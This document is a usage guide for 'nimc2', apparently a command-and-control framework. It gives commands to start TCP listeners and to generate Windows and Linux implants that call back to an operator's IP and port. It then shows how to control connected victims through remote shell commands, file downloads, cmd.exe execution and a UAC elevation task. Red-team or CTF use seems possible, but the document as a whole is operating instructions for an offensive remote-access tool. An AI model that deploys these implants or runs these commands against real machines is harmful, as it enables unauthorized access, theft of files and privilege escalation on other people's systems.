Usage

• The nimc2 server is based on a command line interface and it can be started using the ./server.sh bash script in the root directory.
• You can type your commands as soon as you see the nimc2 main prompt: (main) nimc2 >

Creating a listener

To create a listener use the startlistener command, only TCP listeners are currently supported. You can start a TCP listener using the following command: startlistener tcp tcp_main --ip:(ip) --port:(port). Examples:

• startlistener tcp tcp_main --ip:127.0.0.1 --port:1337: start a TCP listener listening on 127.0.0.1:1337 named tcp_main
• startlistener tcp tcp_main -i:0.0.0.0 -p:1337: start a TCP listener listening on any address, port 1337 named tcp_main
• startlistener tcp tcp_main -i:192.168.0.19 -p:1337: start a TCP listener listening on 192.168.0.19:1337 named tcp_main

Once you created your listener, you can view it using the listeners command.

Generating an implant

Generating an implant is also very easy and only takes one command: generateimplant --type:(listener type) --ip:(ip) --port:(port) --platform:(platform) or generateimplant --listener:(listener type) --platform:(platform). Examples:

• generateimplant -t:tcp -i:127.0.0.1 -p:1337 -P:windows: generate an implant for windows, connecting to 127.0.0.1:1337
• generateimplant -t:tcp -i:127.0.0.1 -p:1337 -P:linux: generate an implant for linux, connecting to 127.0.0.1:1337
• generateimplant -l:tcp_main -P:linux: generate an implant for linux, connecting to the tcp_main listener
• generateimplant -l:tcp_main -P:windows: generate an implant for windows, connecting to the tcp_main listener

Clients will try to auto-connect to your server every 5000 ms. You can change this using the -t argument of the generateimplant command

Interacting with clients

When a client connects to your server, you will get a log informing you. You can view the clients connected to your server using 2 commands:

• clients will show you all the clients that were and are connected currently.
• listeners --clients will show you all the listeners along the clients connected to each of them. This is useful to see how your clients are connected to your server

You can begin interacting with a client using the interact command. Example:

• interact 0: start an interaction with the client with ID 0

You will notice that your prompt changed to something like this: (username@hostname) nimc2 >. This means you are currently interacting with a client and can send commands to it, for example:

• shell: enter shell mode, all commands entered afterwards (except back which will exit shell mode) will be sent using shell [command]
• shell "whoami": run whoami on the client
• download "c:\users\andrei\desktop\flag": download the c:\users\andrei\desktop\flag file
• msgbox "[title]" "[caption]": send a message box (only windows supported!)
• cmd "[command]": run a command via cmd.exe (only windows supported!)

The default implant has many other custom tasks. They can be enumerated using the sendtask enumtasks command. Once you got the list of tasks, you can run sendtask uac_elv (for example) to trigger any task you want. Some might take parameters, you supply them using the other arguments of the sendtask command: sendtask shell "whoami /all" (for example). If you want to see what arguments a task accepts, you will have to look at the source code of that task.

Getting more help

You can use the help command to print all commands and help [command name] to get more info about a specific command